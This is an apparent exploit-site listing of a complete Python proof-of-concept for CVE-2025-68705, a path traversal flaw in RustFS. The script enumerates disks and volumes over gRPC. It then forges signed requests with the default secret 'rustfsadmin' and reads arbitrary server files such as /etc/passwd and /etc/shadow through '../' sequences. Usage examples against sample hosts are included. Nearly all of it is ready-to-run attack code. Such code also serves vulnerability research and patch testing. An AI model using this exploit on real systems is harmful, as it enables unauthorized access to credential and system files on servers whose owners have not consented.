4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
CVE-2025-68705 RustFS Path Traversal Exploit

This script exploits a path traversal vulnerability in RustFS that allows
reading arbitrary files on the server.

Author: Security Researcher
CVE: CVE-2025-68705

Usage:
    python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Required Arguments:
    -H, --host        Target host IP or hostname
    -p, --port        Target port number
    -f, --file        File path to read (optional with --check-only)

Optional Arguments:
    -s, --secret      Secret key for signature (default: rustfsadmin)
    -o, --offset      File read offset (default: 0)
    -l, --length      Number of bytes to read (default: 4096)
    --check-only      Only check if target is vulnerable

Examples:
    python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
    python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -s customsecret -o 0 -l 1024
    python exp.py -H 192.168.1.128 -p 9000 --check-only
"""

import argparse
import base64
import hashlib
import hmac
import re
import socket
import sys
import time
from typing import List, Dict, Optional, Tuple

import requests
from h2.connection import H2Connection
from h2.config import H2Configuration
from h2.events import DataReceived, StreamEnded, TrailersReceived


class RustFSExploit:
    """Exploit class for CVE-2025-68705"""

    def __init__(self, host: str, port: int, secret: str):
        """
        Initialize the exploit.

        Args:
            host: Target host IP or hostname
            port: Target port number
            secret: Secret key for signature generation
        """
        self.host = host
        self.port = port
        self.secret = secret

    def grpc_call(self, method_path: str, request_body: bytes = b'\x00\x00\x00\x00\x00') -> Tuple[bytes, Optional[str]]:
        """
        Make a gRPC call to the target server.

        Args:
            method_path: gRPC method path
            request_body: Request body (protobuf encoded)

        Returns:
            Tuple of (response_body, grpc_status)
        """
        try:
            sock = socket.create_connection((self.host, self.port), timeout=10)
            sock.settimeout(5)

            conn = H2Connection(H2Configuration(client_side=True))
            conn.initiate_connection()
            sock.sendall(conn.data_to_send())

            sid = conn.get_next_available_stream_id()

            headers = [
                (':method', 'POST'),
                (':scheme', 'http'),
                (':authority', f'{self.host}:{self.port}'),
                (':path', method_path),
                ('content-type', 'application/grpc'),
                ('authorization', 'rustfs rpc'),
                ('te', 'trailers')
            ]

            conn.send_headers(sid, headers, end_stream=False)
            conn.send_data(sid, request_body, end_stream=True)
            sock.sendall(conn.data_to_send())

            body, status = b'', None
            while True:
                data = sock.recv(65535)
                if not data:
                    break
                for event in conn.receive_data(data):
                    if isinstance(event, DataReceived):
                        body += event.data
                        conn.acknowledge_received_data(
                            event.flow_controlled_length, event.stream_id
                        )
                    elif isinstance(event, TrailersReceived):
                        status = dict(event.headers).get(b'grpc-status', b'').decode()
                    elif isinstance(event, StreamEnded):
                        break
                else:
                    sock.sendall(conn.data_to_send())
                    continue
                break

            sock.close()
            return body, status

        except Exception:
            return b'', None

    @staticmethod
    def _encode_varint(value: int) -> bytes:
        """
        Encode an integer as a varint.

        Args:
            value: Integer value to encode

        Returns:
            Varint encoded bytes
        """
        if value < 0:
            value = (1 << 64) + value
        bytes_list = []
        while value > 0x7F:
            bytes_list.append((value & 0x7F) | 0x80)
            value >>= 7
        bytes_list.append(value)
        return bytes(bytes_list)

    @staticmethod
    def _encode_string_field(field_num: int, value: str) -> bytes:
        """
        Encode a string field for protobuf.

        Args:
            field_num: Field number
            value: String value to encode

        Returns:
            Encoded bytes
        """
        encoded_value = value.encode('utf-8')
        tag = (field_num << 3) | 2
        length = RustFSExploit._encode_varint(len(encoded_value))
        return bytes([tag]) + length + encoded_value

    def get_disks(self) -> List[str]:
        """
        Get the list of disks from the server.

        Returns:
            List of disk paths
        """
        disks = []
        try:
            body, status = self.grpc_call('/node_service.NodeService/ServerInfo')

            if status == '0' and body and len(body) > 5:
                data = body[5:]

                # Parse msgpack data (field 2, wire type 2 -> tag 0x12)
                i = 0
                while i < len(data):
                    if i >= len(data):
                        break
                    tag = data[i]
                    i += 1

                    field_num = tag >> 3
                    wire_type = tag & 0x07

                    if field_num == 2 and wire_type == 2:
                        # Read length
                        length = 0
                        shift = 0
                        while i < len(data):
                            byte = data[i]
                            i += 1
                            length |= (byte & 0x7F) << shift
                            if not (byte & 0x80):
                                break
                            shift += 7

                        if i + length <= len(data):
                            msgpack_data = data[i:i + length]

                            try:
                                import msgpack
                                unpacked = msgpack.unpackb(msgpack_data, raw=False)

                                if isinstance(unpacked, list) and len(unpacked) > 7:
                                    # Extract disk list (index 7)
                                    if isinstance(unpacked[7], list):
                                        for disk_info in unpacked[7]:
                                            if isinstance(disk_info, list) and len(disk_info) > 0:
                                                disk_path = disk_info[0]
                                                if isinstance(disk_path, str) and disk_path:
                                                    disks.append(disk_path)
                                    break
                            except Exception:
                                pass
                        break
                    elif wire_type == 0:
                        while i < len(data) and (data[i] & 0x80):
                            i += 1
                        i += 1
                    elif wire_type == 2:
                        length = 0
                        shift = 0
                        while i < len(data):
                            byte = data[i]
                            i += 1
                            length |= (byte & 0x7F) << shift
                            if not (byte & 0x80):
                                break
                            shift += 7
                        i += length

        except Exception:
            pass

        return disks

    def get_volumes(self, disk: str) -> List[str]:
        """
        Get the list of volumes for a specific disk.

        Args:
            disk: Disk path

        Returns:
            List of volume names
        """
        volumes = []
        try:
            # Build ListVolumes request
            request_body = self._encode_string_field(1, disk)

            # Add gRPC message header
            message_length = len(request_body)
            header = bytes([
                0,
                (message_length >> 24) & 0xFF,
                (message_length >> 16) & 0xFF,
                (message_length >> 8) & 0xFF,
                message_length & 0xFF
            ])
            full_request = header + request_body

            body, status = self.grpc_call('/node_service.NodeService/ListVolumes', full_request)

            if status == '0' and body and len(body) > 5:
                data = body[5:]

                # Try to extract volume names
                volume_pattern = rb'"name"\s*:\s*"([^"]+)"'
                matches = re.findall(volume_pattern, data)
                volumes = [m.decode() for m in matches]

                # If not found, try direct string search
                if not volumes:
                    str_pattern = rb'"([a-zA-Z0-9_.-]+)"'
                    all_matches = re.findall(str_pattern, data)
                    volumes = [m.decode() for m in all_matches if m and not m.startswith(b'{"')]

        except Exception:
            pass

        return volumes

    def get_disk_and_volume_info(self) -> Dict:
        """
        Get all disks and volumes information.

        Returns:
            Dictionary containing host and disks with their volumes
        """
        result = {"host": f"{self.host}:{self.port}", "disks": []}

        # Get disk list
        disks = self.get_disks()

        if not disks:
            return result

        # Get volumes for each disk
        for disk in disks:
            volumes = self.get_volumes(disk)
            result["disks"].append({
                "path": disk,
                "volumes": volumes
            })

        return result

    @staticmethod
    def _generate_signature(url: str, method: str, timestamp: str, secret: str) -> str:
        """
        Generate HMAC-SHA256 signature for the request.

        Args:
            url: Request URL path
            method: HTTP method
            timestamp: Unix timestamp
            secret: Secret key

        Returns:
            Base64 encoded signature
        """
        data = f"{url}|{method}|{timestamp}"
        signature = hmac.new(
            secret.encode(),
            data.encode(),
            hashlib.sha256
        ).digest()
        return base64.b64encode(signature).decode()

    def read_file(self, disk: str, volume: str, file_path: str, offset: int = 0, length: int = 4096) -> Optional[str]:
        """
        Exploit path traversal to read arbitrary file.

        Args:
            disk: Disk path
            volume: Volume name
            file_path: Path to the file to read (can use ../ for traversal)
            offset: File read offset
            length: Number of bytes to read

        Returns:
            File content or None if failed
        """
        print(f"[*] Exploiting CVE-2025-68705 against {self.host}:{self.port}")
        print(f"[*] Reading file: {file_path}")

        # Build the URL with path traversal
        url = (f"/rustfs/rpc/read_file_stream?"
               f"disk={disk}&volume={volume}&path={file_path}&offset={offset}&length={length}")
        full_url = f"http://{self.host}:{self.port}{url}"

        # Get current timestamp
        timestamp = str(int(time.time()))

        # Generate signature
        signature = self._generate_signature(url, "GET", timestamp, self.secret)

        # Prepare headers
        headers = {
            "x-rustfs-signature": signature,
            "x-rustfs-timestamp": timestamp
        }

        try:
            response = requests.get(full_url, headers=headers, timeout=10)

            if response.status_code == 200:
                return response.text
            else:
                print(f"[-] Request failed with status code: {response.status_code}")
                return None

        except Exception as e:
            print(f"[-] Error during request: {e}")
            return None

    def check_vulnerability(self) -> bool:
        """
        Check if the target is vulnerable by reading /etc/passwd.

        Returns:
            True if vulnerable, False otherwise
        """
        print("[*] Checking for CVE-2025-68705 vulnerability...")

        disk_volume_info = self.get_disk_and_volume_info()

        if not disk_volume_info["disks"]:
            print("[-] No disks found on target")
            return False

        for disk_info in disk_volume_info["disks"]:
            disk = disk_info["path"]
            volumes = disk_info["volumes"]

            if not volumes:
                continue

            volume = volumes[0]

            # Try to read /etc/passwd using path traversal
            result = self.read_file(disk, volume, "../../../../etc/passwd", offset=0, length=700)

            if result and "root:x:0:0" in result:
                print("[+] Target is VULNERABLE!")
                return True

        print("[-] Target does not appear to be vulnerable")
        return False

    def exploit(self, file_path: str, offset: int = 0, length: int = 4096) -> Optional[str]:
        """
        Exploit the path traversal vulnerability to read a file.

        Args:
            file_path: Path to the file to read
            offset: File read offset (default: 0)
            length: Number of bytes to read (default: 4096)

        Returns:
            File content or None if failed
        """
        disk_volume_info = self.get_disk_and_volume_info()

        if not disk_volume_info["disks"]:
            print("[-] No disks found on target")
            return None

        for disk_info in disk_volume_info["disks"]:
            disk = disk_info["path"]
            volumes = disk_info["volumes"]

            if not volumes:
                continue

            volume = volumes[0]

            # Read the file using path traversal
            result = self.read_file(disk, volume, f"../../../../{file_path}", offset, length)

            if result:
                print("[+] Successfully read file!")
                return result

        print("[-] Failed to read file")
        return None


def main():
    """Main entry point for the exploit script."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-68705 RustFS Path Traversal Exploit",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -s rustfsadmin
  python exp.py --host 192.168.1.128 --port 9000 --file /etc/shadow --secret rustfsadmin --offset 0 --length 1024
  python exp.py -H 192.168.1.128 -p 9000 --check-only -s rustfsadmin
        """
    )

    parser.add_argument(
        '-H', '--host',
        required=True,
        help='Target host IP or hostname'
    )
    parser.add_argument(
        '-p', '--port',
        type=int,
        required=True,
        help='Target port number'
    )
    parser.add_argument(
        '-f', '--file',
        help='File path to read'
    )
    parser.add_argument(
        '-o', '--offset',
        type=int,
        default=0,
        help='File read offset (default: 0)'
    )
    parser.add_argument(
        '-l', '--length',
        type=int,
        default=4096,
        help='Number of bytes to read (default: 4096)'
    )
    parser.add_argument(
        '-s', '--secret',
        default='rustfsadmin',
        help='Secret key for signature generation (default: rustfsadmin)'
    )
    parser.add_argument(
        '--check-only',
        action='store_true',
        help='Only check if target is vulnerable, do not read file'
    )

    args = parser.parse_args()

    # Initialize exploit
    exploit = RustFSExploit(args.host, args.port, args.secret)

    print(f"[*] Target: {args.host}:{args.port}")
    print(f"[*] Secret: {args.secret}")
    print("-" * 50)

    if args.check_only:
        # Only check vulnerability
        if exploit.check_vulnerability():
            print("[+] Vulnerability confirmed!")
            sys.exit(0)
        else:
            print("[-] Vulnerability not found")
            sys.exit(1)
    else:
        # Check and exploit
        if exploit.check_vulnerability():
            print("-" * 50)
            result = exploit.exploit(args.file, args.offset, args.length)
            if result:
                print(f"\n[+] File content (offset={args.offset}, length={args.length}):")
                print("-" * 50)
                print(result)
                print("-" * 50)
                sys.exit(0)

    sys.exit(1)


if __name__ == "__main__":
    main()